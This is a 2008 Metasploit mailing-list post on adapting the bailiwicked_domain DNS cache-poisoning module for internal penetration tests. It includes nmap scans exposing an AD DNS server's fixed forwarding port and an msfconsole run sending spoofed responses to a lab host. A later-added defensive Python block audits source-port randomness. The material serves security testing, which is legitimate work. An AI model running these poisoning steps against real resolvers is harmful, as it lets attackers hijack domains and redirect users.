Metasploit mailing list archives
DNS cache poisoning difficulty
From: natron at invisibledenizen.org (natron)
Date: Tue, 29 Jul 2008 18:35:40 -0500
I gave a shot at implementing this and I believe it works. You now have an optional variable where you can set the DNS servers arbitrarily. When set, it'll skip the authoritative checks and only use your DNS server list. You'd probably only want to use this if you were internal.

An example scenario would be:

client --> AD server --> authoritative company DNS resolver --> internet DNS servers

This would be for attacking "AD server" when you know "authoritative company DNS resolver" as well as the "AD Server" source port used to communicate with the resolver.

I've also found that when doing an nmap -sU -sV scan against an AD DNS server, the port AD is using to forward is returning junk nmap doesn't know what to do with (well, at least my version of nmap -- I didn't try an upgrade). See the examples below. You'll notice that the first scan is gibberish, but scans 2 - 4 all contain the string "root-servers". FYI, this is running against Windows 2003 under VMWare ESX (obviously without MS08-037 applied).

Please test this, someone, to see if it's working properly in your environment. It looks like it's working correctly when I monitor it in wireshark, but I've been unsuccessful in poisoning the local cache. I believe this to be a combination of the short race time on a LAN and my inherent impatience.

Bugs: I don't believe the racer functionality is working for some reason; I'm not sure what I broke. I have to set the XIDS manually or it loops on the racer check.
Nathan

Example:

```
[root at localhost dns]# nmap -sU -sV -p- 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:25 CDT
Interesting ports on 172.16.1.251:
Not shown: 65519 closed ports
PORT     STATE         SERVICE       VERSION
53/udp   open          domain        Microsoft DNS
88/udp   open|filtered kerberos-sec
123/udp  open          ntp           NTP v3
137/udp  open          netbios-ns    Microsoft Windows NT netbios-ssn (workgroup: xxxxxxxx)
138/udp  open|filtered netbios-dgm
389/udp  open|filtered ldap
445/udp  open|filtered microsoft-ds
464/udp  open|filtered kpasswd5
500/udp  open|filtered isakmp
1029/udp open|filtered unknown
1033/udp open          unknown
1218/udp open|filtered unknown
1225/udp open|filtered unknown
1234/udp open|filtered unknown
1434/udp open          ms-sql-m      Microsoft SQL Server 8.00.194 (ServerName: xxxx; TCPPort: xxxx)
4500/udp open|filtered sae-urn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE8CB%P=i686-pc-linux-gnu%r(NBTS
SF:tat,1E1,"\x80\xf0\x80\x80\0\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAA\0\0!\0\x01\0\0\x02\0\x01\0\x01F<\0\x14\x01a\x0croot-servers\x0
SF:3net\0\xc02\0\x02\0\x01\0\x01F<\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01
SF:F<\0\x04\x01c\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01d\xc0\?\xc02\0\x0
SF:2\0\x01\0\x01F<\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01f\xc
SF:0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01F<\
SF:0\x04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01F<\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01k\xc0\?
SF:\xc02\0\x02\0\x01\0\x01F<\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x
SF:04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01F<\0\x04\xc6\)\0\x04\xc0\]\0\x01\0\
SF:x01\0\x01F<\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01F<\0\x04\xc0!\x04\
SF:x0c\xc0}\0\x01\0\x01\0\x01F<\0\x04\x80\x08\nZ\xc0\x8d\0\x01\0\x01\0\x01
SF:F<\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0\x01F<\0\x04\xc0\x05\x05\xf
SF:1\xc0\xad\0\x01\0\x01\0\x01F<\0\x04\xc0p\$\x04\xc0\xbd\0\x01\0\x01\0\x0
SF:1FB\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x01\0\x01F<\0\x04\xc0\$\x94\x11\xc
SF:0\xdd\0\x01\0\x01\0\x01F<\0\x04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01F
SF:<\0\x04\xc1\0\x0e\x81\xc0\xfd\0\x01\0\x01\0\x01F<\0\x04\xc7\x07S\*\xc1\
SF:r\0\x01\0\x01\0\x01F<\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)
Service Info: Host: ZEUS; OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.822 seconds

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:27 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE94A%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01E\xaf\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01E\xaf\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01E\
SF:xaf\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01E\xaf\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01E\xaf\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01E\xaf\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01E\xaf\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:E\xaf\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01E\xaf\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01E\xaf\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01E\xaf\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01E\xb5\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01E\xaf\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01E\xaf\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01E\xaf\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01E\xaf\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01E\xa
SF:f\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:40 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DEC45%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\xb4\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\xb4\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:xb4\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\xb4\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\xb4\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\xb4\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\xb4\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\xb4\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\xb4\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\xb4\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\xb4\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B\xba\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01B\xb4\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\xb4\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\xb4\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01B\xb4\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\xb
SF:4\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.617 seconds

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:43 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DECDA%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\x1f\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\x1f\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:x1f\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\x1f\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\x1f\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\x1f\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\x1f\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\x1f\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\x1f\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\x1f\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\x1f\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B%\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x
SF:01\0\x01B\x1f\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\x1f\0\x04\
SF:xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\x1f\0\x04\xc1\0\x0e\x81\xc0\xfd
SF:\0\x01\0\x01\0\x01B\x1f\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\x1f\0
SF:\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.623 seconds

[root at localhost msf-dev]# ./msfconsole

       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf auxiliary(bailiwicked_domain) > set DOMAIN invisibledenizen.org
DOMAIN => invisibledenizen.org
msf auxiliary(bailiwicked_domain) > set SRCPORT 1033
SRCPORT => 1033
msf auxiliary(bailiwicked_domain) > set SRCDNS "172.16.1.1, 10.10.10.10"
SRCDNS => 172.16.1.1, 10.10.10.10
msf auxiliary(bailiwicked_domain) > set SRCDNS 172.16.1.1
SRCDNS => 172.16.1.1
msf auxiliary(bailiwicked_domain) > set XIDS 20
XIDS => 20
msf auxiliary(bailiwicked_domain) > set NEWDNS fakedns.visibledenizens.org
NEWDNS => fakedns.visibledenizens.org
msf auxiliary(bailiwicked_domain) > show options

Module options:

   Name     Current Setting              Required  Description
   ----     ---------------              --------  -----------
   DOMAIN   invisibledenizen.org         yes       The domain to hijack
   NEWDNS   fakedns.visibledenizens.org  yes       The hostname of the replacement DNS server
   RECONS   208.67.222.222               yes       The nameserver used for reconnaissance
   RHOST    172.16.1.251                 yes       The target address
   SRCADDR  Real                         yes       The source address to use for sending the queries (accepted: Real, Random)
   SRCDNS   172.16.1.1                   no        An optional list of DNS servers to spoof as ("10.1.1.1, 10.2.2.2" format)
   SRCPORT  1033                         yes       The target server's source query port (0 for automatic)
   TTL      34282                        yes       The TTL for the malicious host entry
   XIDS     20                           yes       The number of XIDs to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) > save
Saved configuration to: /root/.msf3/config
msf auxiliary(bailiwicked_domain) > run
[*] Targeting nameserver 172.16.1.251 for injection of invisibledenizen.org. nameservers as fakedns.visibledenizens.org
[*] Added 172.16.1.1 into list of domains to spoof as.
[*] Attempting to inject poison records for invisibledenizen.org.'s nameservers into 172.16.1.251:1033...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
```

On Tue, Jul 29, 2008 at 2:21 PM, H D Moore <hdm at metasploit.com> wrote:
> With your setup, the exploits won't work. You could modify the exploit locally, remove the authoritative checks, and hardcode barbs = [ "ip1", "ip2", "ip3"]. Alternatively, add a new option to specify the list of nameservers to spoof and submit the patch :-)
>
> On Tuesday 29 July 2008, Sat Jagat Singh wrote:
>> In testing the spoof/dns/bailiwicked_host (and also bailiwicked_domain) modules on an internal penetration test I have encountered a challenge with firewall filtering of egress to external DNS servers. Let me be clear, I am on the LAN. DNS traffic is not permitted out to the internet except from the organization's own internal DNS servers that perform recursive queries for internal users.
>>
>> Metasploit gets to a point where it attempts to query yahoo's nameserver for authoritativeness and just hangs since the traffic gets dropped at the firewall.
>>
>> Any suggestions?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: bailiwicked_domain.patch
Type: text/x-diff
Size: 5119 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080729/8f45326e/attachment.patch>
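The reason the run above needs only a guessed XID is that the AD server forwards every query from the one source port (1033) the scans exposed. As an added example, not code from the thread, the attached patch or Metasploit, here is a defender-side audit that flags a resolver whose outbound queries reuse a single source port and turns the thread's XIDS=20 / 5000-query run into odds; the captured (port, XID) pairs are constructed, and the function names are my own.

```python
"""Added example (not from the thread or Metasploit): audit a resolver's
outbound (source port, XID) pairs for a fixed source port, the weakness the
nmap scans above expose, and turn the thread's numbers into spoofing odds."""
import math
import random
from collections import Counter

def entropy_bits(values):
    """Shannon entropy, in bits, of the observed value distribution."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())

def audit_queries(samples):
    """samples: (src_port, xid) tuples captured on the resolver's upstream side.
    Observed distinct ports are only a lower bound on the real port space."""
    ports = [p for p, _ in samples]
    xids = [x for _, x in samples]
    return {
        "distinct_ports": len(set(ports)),
        "fixed_port": len(set(ports)) == 1,
        "port_entropy_bits": round(entropy_bits(ports), 2),
        "xid_entropy_bits": round(entropy_bits(xids), 2),
    }

def hit_probability(distinct_ports, guesses_per_query, xid_bits=16):
    """Chance that one upstream query is matched by a burst of forged replies
    that each try a different (port, XID) pair."""
    return min(1.0, guesses_per_query / (distinct_ports * (1 << xid_bits)))

def poison_probability(distinct_ports, guesses_per_query, queries, xid_bits=16):
    """Chance that at least one of `queries` attempts lands; ignores the race
    against the genuine answer, which only lowers the odds further."""
    p = hit_probability(distinct_ports, guesses_per_query, xid_bits)
    return 1 - (1 - p) ** queries

if __name__ == "__main__":
    rng = random.Random(1)
    # Constructed captures: one resolver that always sends from 1033, one that
    # picks an ephemeral port per query (what the MS08-037 fix adds).
    captures = {
        "fixed": [(1033, rng.randrange(1 << 16)) for _ in range(2000)],
        "random": [(rng.randrange(49152, 65536), rng.randrange(1 << 16))
                   for _ in range(2000)],
    }
    for name, cap in captures.items():
        found = audit_queries(cap)
        # Thread numbers: XIDS=20 guesses per query, 5000 queries sent.
        odds = poison_probability(found["distinct_ports"], 20, 5000)
        print(name, found, f"odds after 5000 queries: {odds:.1%}")
```

With a fixed port the 5000-query run already has roughly a 78% chance of a matching XID, so the author's failure to poison is down to the race against the real answer, not the guess space; with per-query ports the same run lands well under 1%.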
Current thread:
- DNS cache poisoning difficulty Sat Jagat Singh (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)
- DNS cache poisoning difficulty Jefferson, Shawn (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)
- DNS cache poisoning difficulty natron (Jul 29)
- DNS cache poisoning difficulty Jefferson, Shawn (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)